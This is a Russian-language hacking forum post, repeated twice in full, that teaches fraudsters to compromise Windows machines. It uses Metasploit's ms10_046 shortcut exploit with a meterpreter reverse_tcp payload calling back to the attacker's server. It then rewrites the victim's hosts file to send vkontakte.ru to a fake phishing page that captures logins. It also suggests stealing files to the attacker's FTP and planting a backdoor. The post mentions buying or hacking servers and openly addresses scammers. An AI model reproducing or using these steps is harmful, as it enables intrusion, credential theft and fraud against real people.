Forum Library
Professional
И так что нам потребуется
Metasploit
Vds с прямым ip (дедик)
Фейк ресурса к которому будем получать доступ в данном случае "Вконтакте"
И так сразу к делу покупаем/ломаем/кардим деда win/nix* кому что по душе
Устанавливаем apache+mysql+php/
В темпе делаем/скачиваем фейк ресурса к которому нам нужен доступ копируем все скрипты фейка в корень нашего сервака переходим по адресу наш.белый.ip.xx лицезреем свежеиспеченный фейк вконтакта, чекаем и приступаем к работе!
/etc/init.d/apache2 stop #Вырубаем апач
Скачиваем metasploit установка займет не более 10 минут.
> msfconsole
#запускаем metasploit
> search ms10_046
#ищем эксплоит
> use windows/browser/ms10_046_shortcut_icon_dllloader
#выбираем эксплоит
> show payloads
#смотрим список доступных начинок для нашего сплоита
> set payload windows/meterpreter/reverse_tcp
#привязывем начинку к сплоиту
>show options
#смотрим настройки
> set lhost наш.белый.ip.xx
#указываем ip к которому будет осущевствлен бекконект
> exploit
#запускаем сплоент
Все сплоит запустился и ждет жертву по адресу наш.белый.ip.xx/ololo/ на нашей тачке открылся 4444 порт в ожидании бекконекта.
Впариваем "шару" жертве не мне вас учить как это делать господа мошенники,как только жертва переходит на нашу "шару" сплоит начинает работать,срабатывает>получаем доступ к шеллу через начинку нашего сплоита.
Посмотреть список доступных команд мы можем командой help так с командами разобрались,наша цель получить логин:пароль конкретного ресурса,наш фейк находится по адресу наш.белый.ip.xx
Командуем в оболочку > shell и получаем полноценный доступ к консоли удаленной машины дальше подкоректируем хост файлик
> echo наш.белый.ip.xx vkontakte.ru >>C:\WINDOWS\system32\drivers\etc\hosts
Ну вот и все теперь не теряем времени ползаем по дискам жертвы качаем всякие вкусняшки к себе на ftp ,посмотри команды cmd винды если не знаеш как это делать ,конечно можно закрепится на удаленной машине закинув на нее бекдор с бекконектом все в твоих руках!Я лиш описываю примитивную пользу от данной уязвимости,заканчиваем свои дела закрываем сессию и метасплоит >exit >exit >exit
/etc/init.d/apache2 start #стартуем апач
Готово теперь как только жертва зайдет на vkontakte.ru её перенаправит на наш фейк, вряд ли жертва что-то заподозрит,
при авторизации логин и пасс сохраняется в скрипте нашего фейка далее её просто редиректит на адрес прописанный в скрипте фейка тут уж на ваше усмотрение.
Видео
Metasploit
Vds с прямым ip (дедик)
Фейк ресурса к которому будем получать доступ в данном случае "Вконтакте"
И так сразу к делу покупаем/ломаем/кардим деда win/nix* кому что по душе
Устанавливаем apache+mysql+php/
В темпе делаем/скачиваем фейк ресурса к которому нам нужен доступ копируем все скрипты фейка в корень нашего сервака переходим по адресу наш.белый.ip.xx лицезреем свежеиспеченный фейк вконтакта, чекаем и приступаем к работе!
/etc/init.d/apache2 stop #Вырубаем апач
Скачиваем metasploit установка займет не более 10 минут.
> msfconsole
#запускаем metasploit
> search ms10_046
#ищем эксплоит
> use windows/browser/ms10_046_shortcut_icon_dllloader
#выбираем эксплоит
> show payloads
#смотрим список доступных начинок для нашего сплоита
> set payload windows/meterpreter/reverse_tcp
#привязывем начинку к сплоиту
>show options
#смотрим настройки
> set lhost наш.белый.ip.xx
#указываем ip к которому будет осущевствлен бекконект
> exploit
#запускаем сплоент
Все сплоит запустился и ждет жертву по адресу наш.белый.ip.xx/ololo/ на нашей тачке открылся 4444 порт в ожидании бекконекта.
Впариваем "шару" жертве не мне вас учить как это делать господа мошенники,как только жертва переходит на нашу "шару" сплоит начинает работать,срабатывает>получаем доступ к шеллу через начинку нашего сплоита.
Посмотреть список доступных команд мы можем командой help так с командами разобрались,наша цель получить логин:пароль конкретного ресурса,наш фейк находится по адресу наш.белый.ip.xx
Командуем в оболочку > shell и получаем полноценный доступ к консоли удаленной машины дальше подкоректируем хост файлик
> echo наш.белый.ip.xx vkontakte.ru >>C:\WINDOWS\system32\drivers\etc\hosts
Ну вот и все теперь не теряем времени ползаем по дискам жертвы качаем всякие вкусняшки к себе на ftp ,посмотри команды cmd винды если не знаеш как это делать ,конечно можно закрепится на удаленной машине закинув на нее бекдор с бекконектом все в твоих руках!Я лиш описываю примитивную пользу от данной уязвимости,заканчиваем свои дела закрываем сессию и метасплоит >exit >exit >exit
/etc/init.d/apache2 start #стартуем апач
Готово теперь как только жертва зайдет на vkontakte.ru её перенаправит на наш фейк, вряд ли жертва что-то заподозрит,
при авторизации логин и пасс сохраняется в скрипте нашего фейка далее её просто редиректит на адрес прописанный в скрипте фейка тут уж на ваше усмотрение.
Видео
